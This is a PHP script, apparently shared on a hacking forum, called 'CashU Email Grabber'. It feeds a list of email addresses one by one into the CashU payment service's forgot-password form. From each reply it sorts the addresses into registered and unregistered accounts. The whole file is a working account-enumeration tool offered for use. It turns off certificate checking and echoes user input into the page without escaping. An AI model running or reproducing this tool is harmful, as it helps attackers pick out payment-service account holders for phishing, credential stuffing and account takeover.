<?php
# ===================================================== #
# #
# ===================================================== #
# contact : willageuro@gmail.com #
# (Forum.guiadohacker.com.br) #
# ===================================================== #
@set_time_limit(0);
if(!file_exists("CashUGrabberCookieFile.txt")){
$fp = @fopen('CashUGrabberCookieFile.txt','w');
@fclose($fp);
}
function curl($url='',$var='',$Follow=False){
global $set;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
curl_setopt($curl, CURLOPT_REFERER, 'https://www.cashu.com/CLogin/forgetPassword');
if($var) {
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $var);
}
curl_setopt($curl, CURLOPT_COOKIE,'CashUGrabberCookieFile.txt');
curl_setopt($curl, CURLOPT_COOKIEFILE,'CashUGrabberCookieFile.txt');
curl_setopt($curl, CURLOPT_COOKIEJAR,'CashUGrabberCookieFile.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
if ($Follow !== False) {
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
}
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
echo "<head>
<style type=\"text/css\"><!--
body,td,th {
font-family: Courier New;
font-size: 12px;
color: #636161;
}
body {
background-color: #0D0C0C;
}
a {
font-size: 12px;
}
a:link {
text-decoration: none;
color: #666666;
}
a:visited {
text-decoration: none;
color: #666666;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
h1,h2,h3,h4,h5,h6 {
font-style: italic;
}
--></style>
<title>CashU Email Grabber - ".$_SERVER['HTTP_HOST']."</title>
</head><div align=\"center\"><pre><font color=\"#FFFFFF\" size=\"3\">=====================================================</font><font size=\"3\">
## ## ## ##### #### ##### #### ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ##
####### ###### ## ## ## ## ## ## ###### ######
## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ##### #### ##### #### ## ##
</font><font color=\"#FFFFFF\" size=\"3\">=====================================================</font></pre>
</center>";
$emails = $_POST['emails'];
print '<form method="POST">
<p><span style="font-size: 15pt"><font color="#FFFFFF">CashU</font> Email Grabber </span></p>
<p>Emails (<font color="#FFFFFF">That you want to check !</font> )<br><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p>
<p><input type="submit" value="Submit" name="B1"></p>
</form>';
if (!empty($emails)) {
$emails = explode("\r\n", $emails);
$yes = 0;
$not = 0;
$inv = 0;
$count = 1;
print "<p align=\"left\">Checking <font color=\"#FFFFFF\"> <b>".count($emails)."</b></font> emails ....<br></p><p align=\"left\">";
foreach ( $emails as $email ) {
$email = trim($email);
print $count .". Checking <font color=\"#FFFFFF\">".$email."</font> ..... <b>";
$count++;
if(filter_var($email, FILTER_VALIDATE_EMAIL)){
$_CheckAction = curl('https://www.cashu.com/CLogin/forgetPasswordNext','userEmail='.$email,TRUE);
if(strpos($_CheckAction, "forgetPasswordConfirmation")) {
print "<font size=\"3\" color=\"#FFFFFF\">Yes</font></b> <br>";
$yes++;
$vaild_yes .=$email."\n";
}
else {
print "<font color=\"#FF0000\">NO</font><br>";
$not++;
$vaild_no .=$email."\n";
}
}
else {
print "<font color=\"#FF0000\">Invaild email</font><br>";
$inv++;
$invaild .=$email."\n";
}
}
print '</p><p><table border="1" width="100%">
<tr>
<td>CashU emails (<font color="#FFFFFF"><b>'.$yes.'</b></font>)</td>
<td>Not CashU emails (<font color="#FFFFFF"><b>'.$not.'</b></font>)</td>
<td>Invalid emails (<font color="#FFFFFF"><b>'.$inv.'</b></font>)</td>
</tr>
<tr>
<td><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></td>
<td><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></td>
<td><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></td>
</tr>
</table></p>';
}
print "<p> </p>
<p>Copyright [<font color=\"#FFFFFF\">2013</font>-<font color=\"#FFFFFF\">2014</font>]<font color=\"#FFFFFF\"> </font>
to<font color=\"#FFFFFF\"> </font>(<font color=\"#FFFFFF\"><a href=\"http://www.xtoolsx.com\">XtoolsX.com</a></font>)<font color=\"#FFFFFF\">
- Hadidi44</font></p>
<p>Contact : <font color=\"#FFFFFF\">Hadidi44</font>[at]<font color=\"#FFFFFF\">ymail</font>[dot]<font color=\"#FFFFFF\">com</font></p>
<p> </p></div>";
?>